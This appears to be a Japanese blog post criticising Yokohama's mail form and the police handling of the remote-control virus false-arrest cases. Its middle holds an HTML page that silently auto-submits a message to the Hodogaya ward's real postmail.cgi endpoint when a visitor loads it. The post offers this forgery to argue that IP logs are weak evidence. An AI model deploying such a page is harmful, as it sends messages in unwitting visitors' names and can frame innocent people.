遠隔操作ウィルス 保土ヶ谷区バージョン

 昨夜調べたら 大阪市に犯行予告が送信されたとき はウィルス(トロイの木馬)を拾ってしまった人のようで。
 「人間らしい操作手順を踏んでいたかどうか」サーバー側ログの鑑定の有無については重要だと思いますが、メールフォームの脆弱性が直接冤罪事件に影響したかどうかは不明ですね。


 反面、神奈川県の保土ヶ谷区に送られた犯行予告のほうは「ウィルスなし」だとさ。
 拝見しますと、これまた大阪市のよりも更に残念臭が漂ってくるメールフォーム。。


http://dl.ftrans.etr.jp/?1ee9a2022726424d89914bde3f7f73cb21d669e7.png


 こちらは大阪市と違って ここの中の人が書いた postmail.cgi を使ってる模様。
 実際には試してはいないですが、たぶん以下の単純な HTML で、大阪市のように「サイトにアクセスしただけで自動的にメール送信」が実現できてしまうと思います。

<html>
<head>
<script>
    function testSubmit()	{
      document.frm.submit();
    }
</script>
</head>
<body onLoad="javascript:setTimeout('testSubmit()',1000);">
<form action="http://cgi.city.yokohama.lg.jp/shimin/kouchou/teian/hodogaya/postmail.cgi" method="post" name="frm">
<input type="hidden" name="mode" value="send" />
<input type="hidden" name="address" value="保土ケ谷区" />
<input type="hidden" name="name" value="" />
<input type="hidden" name="kana" value="" />
<input type="hidden" name="tel" value="" />
<input type="hidden" name="mail" value="" />
<input type="hidden" name="title" value="メール件名" />
<input type="hidden" name="text" value="メール本文" />
</form>
</body>
</html>

 もちろん横浜市のサーバーに記録される IPアドレスは踏んだ人のアドレスです。
 具体的な犯行手法について警察は公開しませんが、この方法だったら、さすがに恥ずかしすぎて公表できないでしょう。


 こんなことで問い合わせを受け付けてしまう横浜市のメールフォーム自体に重大な問題があり、誰が踏んでも犯行予告が横浜市に届いてしまうんだから、IPアドレスなんか全く当てにならない。
 今回の犯行予告に紛れて国内外のスパム業者からの迷惑メールもメールボックスに溢れているはずですが、彼らスパム業者がみんなタイプして送っていると思い込んでいるのか?と問い詰めたいところ。


 リファラーチェックするくらいは常識なのに、こんな腐ったメールフォームを運用してる横浜市と、IPアドレスとパソコンに残された閲覧履歴こそが確固たる証拠だと思い込んでる警察の、双方の無知の合わせ技でないと絶対に起きえない冤罪事件。
 「電子政府」が呆れるどころか、こんな次元の「お遊び」で逮捕〜起訴まで進行してしまう警察〜検察〜裁判所の無能さ。


 たまたまリンクを踏んでしまっただけの明治大学の学生さんは、どういう心境で「犯行を自供」したのでしょうか。


 横浜市レベルの脆弱なメールフォームは巷に溢れかえってます。
 短縮URL が氾濫するなか、明日は我が身ですよ。


(結論)
 他の役所宛にも(勝手に)送られた犯行予告は迷惑メールに仕訳されていたとのこと。
 まじめにタイプしても、迷惑メールと見なされるかどうか迷惑メールフィルタリングソフト次第


 犯行予告を警察が無視したことで起きた事件なんて秋葉原のあれくらいで、日本で起きる犯罪の99.999999%以上は犯罪予告なんてないんだから、犯罪予告が届くたびに警察が右往左往するコストに比べたら、無視したほうが格段に安い。


 311を機に日本は「人の命は地球より重い」から「人の健康と安全は経済的合理性とのバランスで」という国に大きく変貌したのですから。